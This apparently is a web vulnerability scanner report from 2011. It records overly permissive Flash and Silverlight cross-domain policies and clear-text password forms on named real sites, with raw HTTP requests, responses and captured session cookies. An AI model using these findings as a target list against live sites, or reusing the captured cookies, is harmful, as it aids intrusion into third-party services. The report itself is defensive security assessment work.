Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: 2e76.v.fwmrm.net Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: _cph="1295039779.438.1.1,"; _vr="1295482435..60536~60671~66149~103579~170504~173095~306401~,"; _uid="a104_5562153497824379009"; _wr="g11951"; _auv="g11951~5.1296076541.0,12670.1296075237.880,12671.1296076541.0,^"; _cvr="1296076529^11575^sg11951~sg11611^0~0^2206.000000~0.000000,"; _pr="1296076540.8163.209169~209170~,1296076434.7120.209169~209170~,1296076334.4450.209169~209170~,1296076263.3972.209169~209170~,1296076138.3959.209169~209170~,1296076027.4830.209169~209170~,1296075922.4171.209169~209170~,1296075822.3611.209169~209170~,1296075754.4614.209169~209170~,1296075621.9008.209169~209170~,1296075510.8419.209169~209170~,1296075405.9586.209169~209170~,1296075304.8942.209169~209170~,1296075235.1965.209169~209170~,1296075101.798.209169~209170~,1296074990.1228.209169~209170~,1296074859.104.209169~209170~,1296074758.1162.209169~209170~,1296074642.5926.209169~209170~,1296074515.1669.209169~209170~,1296074405.2652.209169~209170~,1296074299.7276.209169~209170~,1296074199.8486.209169~209170~,1296074130.5588.209169~209170~,1296074005.5439.209169~209170~,1296073893.9848.209169~209170~,1296073785.9641.209169~209170~,1296073682.7603.209169~209170~,1296073611.6354.209169~209170~,1296073486.2138.209169~209170~,1296073374.8594.209169~209170~,1296073267.5235.209169~209170~,1296073166.3153.209169~209170~,1296073098.1567.209169~209170~,1296072968.5610.209169~209170~,"; _sc="sg11951.1296072535.1296076541.28800.2377.0,"
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for FreeWheel Media Servers. For support contact webmaster at ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://core.videoegg.com/eap/12368/html/swf/AdManager.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Cache-Control: no-cache Content-Type: text/xml Content-Length: 111
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: app.scanscout.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:07:34 GMT Server: Apache Last-Modified: Fri, 17 Jul 2009 15:29:39 GMT ETag: "2e0ae0-117-46ee874ddbec0" Accept-Ranges: bytes Content-Length: 279 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: audience.visiblemeasures.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:07:56 GMT Content-Type: application/xml Content-Length: 169 Last-Modified: Thu, 04 Nov 2010 01:46:34 GMT Server: Jetty(7.x.y-SNAPSHOT)
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: beacon.securestudies.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT Content-Type: application/xml Vary: Accept-Encoding Expires: Fri, 04 Feb 2011 21:07:36 GMT Date: Thu, 03 Feb 2011 21:07:36 GMT Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS Content-Length: 201
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: bp.specificclick.net
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/xml Content-Length: 193 Date: Thu, 03 Feb 2011 19:11:24 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: c.brightcove.com Proxy-Connection: keep-alive Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=486&height=322&flashID=myExperience700903960001&bgcolor=%23FFFFFF&playerID=64829845001&playerKey=AQ~~%2CAAAADnAS0wE~%2CddeyF9dBubzZEABHXI8Tafb593RYf5ad&isVid=true&dynamicStreaming=true&%40videoPlayer=700903960001&autoStart= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 If-Modified-Since: Tue, 21 Dec 2010 18:59:05 UTC
Response
HTTP/1.1 200 OK X-BC-Client-IP: 173.193.214.243 X-BC-Connecting-IP: 173.193.214.243 Last-Modified: Tue, 01 Feb 2011 21:45:33 UTC Cache-Control: must-revalidate,max-age=0 Content-Type: application/xml Content-Length: 387 Date: Thu, 03 Feb 2011 19:34:37 GMT Server:
<?xml version="1.0"?> <cross-domain-policy> <!-- Note: secure=false is confusing, but basically its saying to allow SSL connections. Their reasoning is something abo ...[SNIP]... <allow-access-from domain="*" secure="false" /> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: cdn.gigya.com
Response
HTTP/1.0 200 OK Content-Length: 509 Content-Type: text/xml Last-Modified: Thu, 27 Aug 2009 08:53:58 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 x-server: web103 P3P: CP="IDC COR PSA DEV ADM OUR IND ONL" X-Powered-By: ASP.NET Cache-Control: max-age=86400 Date: Fri, 04 Feb 2011 02:02:16 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: col.stc.s-msn.com
Response
HTTP/1.0 200 OK Cache-Control: max-age=31536000 Content-Type: text/xml Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT Accept-Ranges: bytes ETag: "06e6dae977dc81:0", Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Server: co1mppstca03 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Fri, 04 Feb 2011 17:55:20 GMT Content-Length: 224 Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: dev.virtualearth.net
Response
HTTP/1.1 200 OK Cache-Control: max-age=5443200 Content-Type: text/xml Last-Modified: Mon, 13 Dec 2010 18:38:09 GMT Accept-Ranges: bytes ETag: "a908de3f49acb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Fri, 04 Feb 2011 01:49:40 GMT Connection: close Content-Length: 277
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: gscounters.gigya.com
Response
HTTP/1.1 200 OK Content-Length: 341 Content-Type: text/xml Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT Accept-Ranges: bytes ETag: "c717c7c65530ca1:271f" Server: Microsoft-IIS/6.0 P3P: CP="IDC COR PSA DEV ADM OUR IND ONL" x-server: web202 X-Powered-By: ASP.NET Date: Fri, 04 Feb 2011 02:02:15 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ll.static.abc.com
Response
HTTP/1.0 200 OK Cache-Control: max-age=150 Content-Type: text/xml Accept-Ranges: bytes ETag: "8067593ddb1cb1:1a129" Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: abc02 Cache-Expires: Thu, 03 Feb 2011 16:07:43 GMT Content-Length: 224 X-UA-Compatible: IE=EmulateIE7 Date: Fri, 04 Feb 2011 01:59:12 GMT Last-Modified: Tue, 11 Jan 2011 22:19:13 GMT Expires: Fri, 04 Feb 2011 02:01:42 GMT Connection: close
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy>
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: superpages.122.2o7.net
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:17:34 GMT Server: Omniture DC/2.0.0 xserver: www17 Content-Length: 167 Keep-Alive: timeout=15 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: uat.netmng.com
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:10:56 GMT Server: Apache/2.2.9 Last-Modified: Mon, 13 Dec 2010 13:30:04 GMT ETag: "1b6168-6a-4974ab3a2af00" Accept-Ranges: bytes Content-Length: 106 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: a.abc.com
Response
HTTP/1.0 200 OK Content-Length: 856 Content-Type: text/xml Last-Modified: Tue, 11 Jan 2011 22:19:00 GMT Accept-Ranges: bytes ETag: "062b58bddb1cb1:5799" Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: abcmed09 X-Powered-By: ASP.NET Cache-Expires: Tue, 11 Jan 2011 22:26:38 GMT X-UA-Compatible: IE=EmulateIE7 Cache-Control: max-age=246 Date: Fri, 04 Feb 2011 02:02:28 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: adadvisor.net
Response
HTTP/1.1 200 OK Date: Fri, 04 Feb 2011 17:54:51 GMT Server: Apache Last-Modified: Fri, 21 Jan 2011 20:30:42 GMT ETag: "165-49a611fc44056" Accept-Ranges: bytes Content-Length: 357 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.1 Host: ak1.ostkcdn.com Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1787227/3-inBannerVideo2011_ViPrPf_New.swf?clickTag=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3aa3%2F3%2F0%2F%252a%2Ff%253B234670317%253B0-0%253B0%253B58524542%253B4307-300%2F250%253B40113270%2F40131057%2F2%253Bu%253D%252Clb-1482036_1296770433%252C11d765b6a10b1b3%252Cnone%252Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%253B%257Efdr%253D234572024%253B0-0%253B0%253B32934908%253B4307-300%2F250%253B40173662%2F40191449%2F1%253Bu%253D%252Clb-1482036_1296770433%252C11d765b6a10b1b3%252Cnone%252Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%253B%257Esscs%253D%253f&xmlFile=InBannerVideo_ViPrPf_LongboardVA_ronQ1.xml&taxonomyId=2&taxonomyType=sto&productCID=654321&keywords=&skus=12370379|12958970|11254000|12370390|10927901|11915556|13002490|10738953|12970899|12532546|12130097|12753446|11551645|066987|11144650|10355113|13197342|12941235|12370383|12978335|12453900 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Thu, 16 Dec 2010 06:09:38 GMT Accept-Ranges: bytes ntCoent-Length: 230 Content-Type: text/x-cross-domain-policy X-Pad: avoid browser bug Cache-Control: private Date: Thu, 03 Feb 2011 22:00:35 GMT Connection: close Vary: Accept-Encoding Content-Length: 230
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.1 Host: ak2.ostkcdn.com Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1787227/3-inBannerVideo2011_ViPrPf_New.swf?clickTag=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3aa3%2F3%2F0%2F%252a%2Ff%253B234670317%253B0-0%253B0%253B58524542%253B4307-300%2F250%253B40113270%2F40131057%2F2%253Bu%253D%252Clb-1482036_1296770433%252C11d765b6a10b1b3%252Cnone%252Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%253B%257Efdr%253D234572024%253B0-0%253B0%253B32934908%253B4307-300%2F250%253B40173662%2F40191449%2F1%253Bu%253D%252Clb-1482036_1296770433%252C11d765b6a10b1b3%252Cnone%252Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%253B%257Esscs%253D%253f&xmlFile=InBannerVideo_ViPrPf_LongboardVA_ronQ1.xml&taxonomyId=2&taxonomyType=sto&productCID=654321&keywords=&skus=12370379|12958970|11254000|12370390|10927901|11915556|13002490|10738953|12970899|12532546|12130097|12753446|11551645|066987|11144650|10355113|13197342|12941235|12370383|12978335|12453900 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Thu, 16 Dec 2010 06:09:38 GMT Accept-Ranges: bytes ntCoent-Length: 230 Content-Type: text/x-cross-domain-policy X-Pad: avoid browser bug Cache-Control: private Date: Thu, 03 Feb 2011 22:00:42 GMT Connection: close Vary: Accept-Encoding Content-Length: 230
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: googleads.g.doubleclick.net
Response
HTTP/1.0 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/x-cross-domain-policy; charset=UTF-8 Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT Date: Thu, 03 Feb 2011 19:10:29 GMT Expires: Fri, 04 Feb 2011 19:10:29 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Cache-Control: public, max-age=86400 Age: 357
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.apple.com
Response
HTTP/1.0 200 OK Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT ETag: "8d-3f8918f48ef00" Server: Apache/2.2.11 (Unix) X-N: S X-Cache-TTL: 600 X-Cached-Time: Wed, 22 Dec 2010 18:51:54 GMT Content-Type: application/xml Content-Length: 141 Cache-Control: max-age=158 Expires: Thu, 03 Feb 2011 17:50:08 GMT Date: Thu, 03 Feb 2011 17:47:30 GMT Connection: close
The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: dev.virtualearth.net
Response
HTTP/1.1 200 OK Cache-Control: max-age=5443200 Content-Type: text/xml Last-Modified: Mon, 13 Dec 2010 18:38:09 GMT Accept-Ranges: bytes ETag: "a92e8be3f49acb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Fri, 04 Feb 2011 01:49:40 GMT Connection: close Content-Length: 374
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: superpages.122.2o7.net
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:17:34 GMT Server: Omniture DC/2.0.0 xserver: www334 Content-Length: 263 Keep-Alive: timeout=15 Connection: close Content-Type: text/html
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
GET / HTTP/1.1 Host: advertise.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 22:03:27 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Set-Cookie: PHPSESSID=6299093c20d21df56a507e2d4f08aada; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 6299093c20d21df56a507e2d4f08aada=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 84850
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Free Software and Sh ...[SNIP]... <div id="signin" style="visibility: hidden;"> <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);"> <div class='bgBlue'> ...[SNIP]... <br /> <input type="password" name="pw" size="20" maxlength="20" value="" /> </p> ...[SNIP]...
GET / HTTP/1.1 Host: advertise.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 22:03:27 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Set-Cookie: PHPSESSID=6299093c20d21df56a507e2d4f08aada; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 6299093c20d21df56a507e2d4f08aada=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 84850
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://boardreader.com/my/subscription.html
The form contains the following password field:
pass
Request
GET /my.html HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:31:23 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
GET /showthread.php?t\\x3d1355583\\x22 HTTP/1.1 Host: forums.digitalpoint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.butterscotch.com/?src=tcv3video
The form contains the following password field:
password
Request
GET /?src=tcv3video HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.butterscotch.com/signup.html
The form contains the following password fields:
password
password2
Request
GET /?src=tcv3video HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.butterscotch.com/tutorials.html
The form contains the following password field:
password
Request
GET /tutorials.html HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.butterscotch.com/signup.html
The form contains the following password fields:
password
password2
Request
GET /tutorials.html HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.ericmmartin.com/wordpress/wp-login.php
The form contains the following password field:
pwd
Request
GET /projects/simplemodal/ HTTP/1.1 Host: www.ericmmartin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
